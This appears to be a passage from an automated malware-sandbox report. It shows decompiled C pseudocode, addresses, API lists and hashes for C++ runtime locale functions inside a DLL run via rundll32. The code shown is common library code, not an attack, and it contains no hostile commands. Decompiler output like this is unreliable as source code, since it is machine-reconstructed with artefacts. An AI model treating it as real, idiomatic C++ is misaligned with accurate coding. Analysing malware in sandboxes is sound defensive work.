                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F422
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F42C
                          • int.LIBCPMT ref: 6E20F443
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F47D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F49D
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F4BB
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
                          • Instruction ID: a5d1dd125845e15b005faedafa4bb64f4ef57cd44b46559f3334f0af271d1c59
                          • Opcode Fuzzy Hash: 839303fdf665165a7799a76378e30577329f39a3d10d44992772ca2522db32c9
                          • Instruction Fuzzy Hash: 4411E375A1051E9BCF00EBE0CC94AEEB77BBF44B25F240918E9116B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A24B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E20A24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t94 =  *0x6e2c6cd0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6E1E161C(0x6e2c6cbc);
				_t71 = _a8;
				_t36 = E6E1E171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t91, _t94, 0x14);
							E6E206653( &_v20, 0);
							_t95 =  *0x6e2c6cd4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6E1E161C(0x6e2c6cc0);
							_t78 = _a8;
							_t92 = E6E1E171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6E1E1438(_t82);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6e26ba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6E206FD3(__eflags, _t92);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6e2c6cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6E206FD3(__eflags, _t91);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6e2c6cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}















                          0x6e20a24b
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a27c
                          0x6e20a281
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A252
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A25C
                          • int.LIBCPMT ref: 6E20A273
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20A2AD
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A2CD
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A2EB
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
                          • Instruction ID: 636a2fded1faa2f8d9604b56e602cb01600b6586baba97773650e95b435a012b
                          • Opcode Fuzzy Hash: 5a394ba2f1bce5b3a882115d99e270e00b5ae1972690586da189c526454c2d97
                          • Instruction Fuzzy Hash: D31106B5A0052E8FCF00DBE4C898AEDB77BBF54714F140918E4116B2D0DF749A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F2CF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t726 - 0x14, 0);
				_t693 =  *0x6e2c6dec; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6E1E161C(0x6e2c6d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6E2066BA(_t726 - 0x14);
					return E6E220075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6E210F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t726 - 0x20);
							E6E223D74(_t726 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t676, _t693, 0x14);
							E6E206653(_t726 - 0x14, 0);
							_t694 =  *0x6e2c6dbc; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6E1E161C(0x6e2c6d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6E2066BA(_t726 - 0x14);
								return E6E220075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6E210FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t726 - 0x20);
										E6E223D74(_t726 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t513, _t677, _t694, 0x14);
										E6E206653(_t726 - 0x14, 0);
										_t695 =  *0x6e2c6df0; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6E1E161C(0x6e2c6d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6E2066BA(_t726 - 0x14);
											return E6E220075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6E211057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t726 - 0x20);
													E6E223D74(_t726 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t513, _t678, _t695, 0x14);
													E6E206653(_t726 - 0x14, 0);
													_t696 =  *0x6e2c6dc0; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6E1E161C(0x6e2c6d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6E2066BA(_t726 - 0x14);
														return E6E220075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6E2110BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t726 - 0x20);
																E6E223D74(_t726 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t513, _t679, _t696, 0x14);
																E6E206653(_t726 - 0x14, 0);
																_t697 =  *0x6e2c6df8; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6E1E161C(0x6e2c6da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6E2066BA(_t726 - 0x14);
																	return E6E220075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6E211127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t726 - 0x20);
																			E6E223D74(_t726 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t513, _t680, _t697, 0x14);
																			E6E206653(_t726 - 0x14, 0);
																			_t698 =  *0x6e2c6df4; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6E1E161C(0x6e2c6da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6E2066BA(_t726 - 0x14);
																				return E6E220075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6E2111AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t726 - 0x20);
																						E6E223D74(_t726 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t513, _t681, _t698, 0x14);
																						E6E206653(_t726 - 0x14, 0);
																						_t699 =  *0x6e2c6dc8; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6E1E161C(0x6e2c6d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6E2066BA(_t726 - 0x14);
																							return E6E220075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6E211230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t726 - 0x20);
																									E6E223D74(_t726 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t513, _t682, _t699, 0x14);
																									E6E206653(_t726 - 0x14, 0);
																									_t700 =  *0x6e2c6dc4; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6E1E161C(0x6e2c6d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6E2066BA(_t726 - 0x14);
																										return E6E220075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6E2112B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t726 - 0x20);
																												E6E223D74(_t726 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t513, _t683, _t700, 0x14);
																												E6E206653(_t726 - 0x14, 0);
																												_t701 =  *0x6e2c6dd8; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6E1E161C(0x6e2c6d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6E2066BA(_t726 - 0x14);
																													return E6E220075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6E211339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t726 - 0x20);
																															E6E223D74(_t726 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t513, _t684, _t701, 0x14);
																															E6E206653(_t726 - 0x14, 0);
																															_t702 =  *0x6e2c6db0; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6E1E161C(0x6e2c6d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6E2066BA(_t726 - 0x14);
																																return E6E220075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6E2113A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t726 - 0x20);
																																		E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t513, _t685, _t702, 0x14);
																																		E6E206653(_t726 - 0x14, 0);
																																		_t703 =  *0x6e2c6ddc; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6E1E161C(0x6e2c6d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6E2066BA(_t726 - 0x14);
																																			return E6E220075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6E211409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t726 - 0x20);
																																					E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t513, _t686, _t703, 0x14);
																																					E6E206653(_t726 - 0x14, 0);
																																					_t704 =  *0x6e2c6de0; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6E1E161C(0x6e2c6d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6E2066BA(_t726 - 0x14);
																																						return E6E220075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6E211471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t726 - 0x20);
																																								E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t513, _t687, _t704, 0x14);
																																								E6E206653(_t726 - 0x14, 0);
																																								_t705 =  *0x6e2c6dfc; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6E1E161C(0x6e2c6da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6E2066BA(_t726 - 0x14);
																																									return E6E220075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6E2114EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t726 - 0x20);
																																											E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t513, _t688, _t705, 0x14);
																																											E6E206653(_t726 - 0x14, 0);
																																											_t706 =  *0x6e2c6dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6E1E161C(0x6e2c6d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6E2066BA(_t726 - 0x14);
																																												return E6E220075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6E211558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t726 - 0x20);
																																														E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t513, _t689, _t706, 0x14);
																																														E6E206653(_t726 - 0x14, 0);
																																														_t707 =  *0x6e2c6e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6E1E161C(0x6e2c6dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6E2066BA(_t726 - 0x14);
																																															return E6E220075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6E2115C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t726 - 0x20);
																																																	E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t513, _t690, _t707, 0x14);
																																																	E6E206653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6e2c6dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6E1E161C(0x6e2c6d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6E1E171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6E2066BA(_t726 - 0x14);
																																																		return E6E220075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6E21162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6E1E1438(_t625);
																																																				E6E223D74(_t726 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e26851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6e26c0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6E21542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6E220075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6E206FD3(__eflags, _t691);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6e2c6dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6E206FD3(__eflags, _t690);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6e2c6e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6E206FD3(__eflags, _t689);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6e2c6dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6E206FD3(__eflags, _t688);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6e2c6dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6E206FD3(__eflags, _t687);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6e2c6de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6E206FD3(__eflags, _t686);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6e2c6ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6E206FD3(__eflags, _t685);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6e2c6db0 = _t685;
																																		goto L68;
																																	}
																																} else {
